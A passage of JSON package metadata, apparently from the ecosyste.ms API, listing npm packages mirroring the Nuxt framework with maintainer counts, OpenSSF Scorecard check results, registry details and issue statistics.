ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Ftypes/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Ftypes/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Ftypes/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Ftypes/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Ftypes/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Ftypes/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:15:31.442Z","updated_at":"2025-02-11T09:15:31.442Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":12687455,"name":"@depup/nuxt","ecosystem":"npm","description":"Nuxt is a free and open-source framework with an intuitive and extendable way to create type-safe, performant and production-grade full-stack web applications and websites with Vue.js. (with updated dependencies)","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":["nuxt","depup","updated-dependencies","security","latest","patched"],"namespace":"depup","versions_count":15,"first_release_published_at":"2026-01-13T00:34:09.937Z","latest_release_published_at":"2026-04-09T16:41:23.309Z","latest_release_number":"4.4.2-depup.12","last_synced_at":"2026-05-11T01:23:05.786Z","created_at":"2026-01-18T18:34:41.419Z","updated_at":"2026-05-11T01:23:05.786Z","registry_url":"https://www.npmjs.com/package/@depup/nuxt","install_command":"npm install @depup/nuxt","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.4.2-depup.12"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:03.331Z","dependent_packages_count":0,"downloads":307,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":10.357624416034913,"dependent_repos_count":10.22930459823613,"dependent_packages_count":11.596876643303734,"stargazers_count":0.08349418599229771,"forks_count":0.35109706175809624,"docker_downloads_count":null,"average":6.523679381065034},"purl":"pkg:npm/%40depup/nuxt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@depup/nuxt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@depup/nuxt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@depup/nuxt/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-14T03:00:14.790Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":794,"past_year_pull_requests_count":1333,"past_year_avg_time_to_close_issue":663267.8147268408,"past_year_avg_time_to_close_pull_request":224371.09162561575,"past_year_issues_closed_count":421,"past_year_pull_requests_closed_count":1015,"past_year_pull_request_authors_count":124,"past_year_issue_authors_count":579,"past_year_avg_comments_per_issue":2.1788413098236776,"past_year_avg_comments_per_pull_request":3.312078019504876,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":539,"past_year_merged_pull_requests_count":900,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":261,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"antfu","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt/version_numbers","latest_versio